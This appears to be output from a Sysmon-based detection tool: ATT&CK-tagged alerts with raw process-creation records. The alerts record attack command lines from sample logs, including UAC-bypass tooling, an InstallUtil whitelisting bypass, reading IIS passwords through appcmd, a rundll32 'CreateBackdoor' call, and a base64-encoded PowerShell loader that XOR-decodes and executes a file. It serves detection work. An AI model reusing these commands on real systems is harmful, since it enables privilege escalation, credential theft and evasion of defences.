3840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-863B-5CD3-0000-00204A390100
0x1394a
1
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-8980-5CD3-0000-00105F451F00
3884
C:\Windows\System32\eventvwr.exe
"C:\Windows\system32\eventvwr.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1,"
1
5
4
1
0
0x8000000000000000
11116
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-09 01:59:28.903
365ABB72-8980-5CD3-0000-0010134D1F00
3840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-863B-5CD3-0000-00204A390100
0x1394a
1
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-8980-5CD3-0000-00105F451F00
3884
C:\Windows\System32\eventvwr.exe
"C:\Windows\system32\eventvwr.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1,"
1
5
4
1
0
0x8000000000000000
6171
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:43.969
365ABB72-FE6B-5CEB-0000-00102A090C00
1536
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1,"
1
5
4
1
0
0x8000000000000000
6171
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:43.969
365ABB72-FE6B-5CEB-0000-00102A090C00
1536
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1557621155.258262,2019-05-12T04:32:35.258262+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn elevator ),1,"
1
5
4
1
0
0x8000000000000000
16245
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 00:32:35.070
365ABB72-69A3-5CD7-0000-0010306F2200
3752
C:\Windows\System32\schtasks.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Manages scheduled tasks
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\schtasks.exe" /run /tn elevator
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-5DEC-5CD7-0000-00204A380100
0x1384a
1
High
SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
365ABB72-6998-5CD7-0000-00104E422200
2740
C:\Python27\python.exe
python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557670689.589507,2019-05-12T18:18:09.589507+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
16451
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 14:18:03.558
365ABB72-2B1B-5CD8-0000-0010CCC92500
3320
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-252D-5CD8-0000-001019E20300
2800
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1606412291.655964,2020-11-26T21:38:11.655964+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
2362770
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2020-11-26 17:38:11.175
00247C92-E803-5FBF-0000-0010F2BFB40C
16980
C:\Windows\System32\cmd.exe
10.0.18362.449 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\windows\system32\cmd.exe"
C:\windows\system32\
LAPTOP-JU4M3I0E\bouss
00247C92-3404-5FBE-0000-0020E0C90600
0x6c9e0
1
High
SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
00247C92-E803-5FBF-0000-0010CDB9B40C
17336
C:\Windows\System32\taskhostw.exe
taskhostw.exe $(Arg0)
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1560583325.973009,2019-06-15T11:22:05.973009+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
1
5
4
1
0
0x8000000000000000
7681
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-06-15 07:22:05.660
365ABB72-9C9D-5D04-0000-001039CE1600
172
C:\Windows\System32\wscript.exe
5.8.7600.16385
Microsoft ® Windows Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
"C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-98E4-5D04-0000-0020A4350100
0x135a4
1
High
SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983
365ABB72-9C8E-5D04-0000-0010D0421600
540
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435993.225412,2019-07-30T01:33:13.225412+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4900
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:13.169
747F3D96-6619-5D3F-0000-0010FDE78600
5116
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.964573,2019-05-27T05:29:19.964573+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1,"
1
5
4
1
0
0x8000000000000000
5973
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.924
365ABB72-3D6F-5CEB-0000-001072D7FF00
3640
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABl
AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564840229.461449,2019-08-03T17:50:29.461449+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5523
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 13:50:28.662
747F3D96-9124-5D45-0000-00103B986101
6236
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-9124-5D45-0000-001022926101
3180
C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe
"C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564831398.715586,2019-08-03T15:23:18.715586+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5407
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 11:23:17.636
747F3D96-6EA5-5D45-0000-001032CCE100
6068
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-D4E9-5D45-0000-0020E7030000
0x3e7
1
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6EA5-5D45-0000-00107AC9E100
932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1558969963.990983,2019-05-27T19:12:43.990983+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami /groups ) ,1,"
1
5
4
1
0
0x8000000000000000
6170
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:38.270
365ABB72-FE66-5CEB-0000-0010C7F80B00
1168
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami /groups
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-FE66-5CEB-0000-001058F50B00
3256
C:\Windows\System32\cmd.exe
cmd.exe /c whoami /groups
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1628379198.562808,2021-08-08T03:33:18.562808+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe ),1,"
1
5
4
1
0
0x8000000000000000
557006
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-08-07 23:33:15.285
747F3D96-183B-610F-0000-0010DC6CD400
11324
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1231-610F-0000-002057A80700
0x7a857
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
00000000-0000-0000-0000-000000000000
1108
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243523
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.544
747F3D96-9F61-5E75-0000-001056711E00
7380
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243523
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.544
747F3D96-9F61-5E75-0000-001056711E00
7380
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\sysprep\sysprep.exe , Parent CommandLine ("C:\Windows\System32\sysprep\sysprep.exe") in directory : ( C:\Windows\system32\WindowsPowerShell\v1.0\ )",1,"
1
5
4
1
0
0x8000000000000000
17729
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 02:32:51.728
365ABB72-28D3-5CDA-0000-001088C71300
3976
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\
IEWIN7\IEUser
365ABB72-26E1-5CDA-0000-002045350100
0x13545
1
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-28D3-5CDA-0000-00106DC31300
3068
C:\Windows\System32\sysprep\sysprep.exe
"C:\Windows\System32\sysprep\sysprep.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243523
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.544
747F3D96-9F61-5E75-0000-001056711E00
7380
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" ),1,"
1
5
4
1
0
0x8000000000000000
17729
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 02:32:51.728
365ABB72-28D3-5CDA-0000-001088C71300
3976
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\
IEWIN7\IEUser
365ABB72-26E1-5CDA-0000-002045350100
0x13545
1
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-28D3-5CDA-0000-00106DC31300
3068
